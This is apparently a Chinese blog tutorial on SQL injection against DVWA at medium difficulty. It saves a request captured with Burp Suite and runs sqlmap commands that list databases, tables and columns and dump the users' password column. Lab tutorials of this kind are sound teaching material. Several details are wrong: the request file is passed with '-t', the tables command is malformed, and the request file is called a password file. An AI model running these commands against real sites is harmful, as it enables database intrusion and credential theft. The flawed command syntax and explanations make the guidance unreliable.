Qing

用sqlmap跑POST型中级注入 DVWA
设置浏览器本地代理1,浏览器设置本地代理-[不同的浏览器有不同的设置方法]Burp Suite设置代理界面2,BP...
扫描右侧二维码阅读全文
04
2019/03

用sqlmap跑POST型中级注入 DVWA

设置浏览器本地代理

1,浏览器设置本地代理-[不同的浏览器有不同的设置方法]

Burp Suite设置代理界面

2,BP抓包软件:Burp Suite设置本地代理

设置DVWA难度等级medium

3,浏览器打开DVWA -->DVWA Securlity-->设置难度等级Medium为中级 ,点击Submit

DVWA注入界面

4,浏览器打开DVWA-->SQL Injection-->submit

监听拦截界面

5,打开拦截,拦截到这个界面就行。

6,urp Suite 监听到数据包,右键Copy to file 保存到/root/1.txt

7,打开终端,输入命令

sqlmap -t /root/1.txt --dbs #获取所有库
sqlmap -t /root/1.txt -D dvwa -T --tables#获取所有表
sqlmap -t /root/1.txt -D dvwa -T users --columns #获取所有字段
sqlmap -t /root/1.txt -D dvwa -T users -C password --dump #获取所有字段的值

  • --dbs #获取所有数据库
  • --tables #获取所有表
  • --columns #获取所有字段
  • --dump 获取值
  • -D #后跟数据库
  • -T #后跟表名
  • -C #后跟字段名

/root/1.txt:是密码文件,自己可以写。

dvwa是一个数据库,可以更改

users是dvwa数据库中的表

password 是users 里面的字段

具体操作图片展示:

最后修改:2019 年 04 月 06 日 02 : 34 PM
如果觉得我的文章对你有用,请随意赞赏

发表评论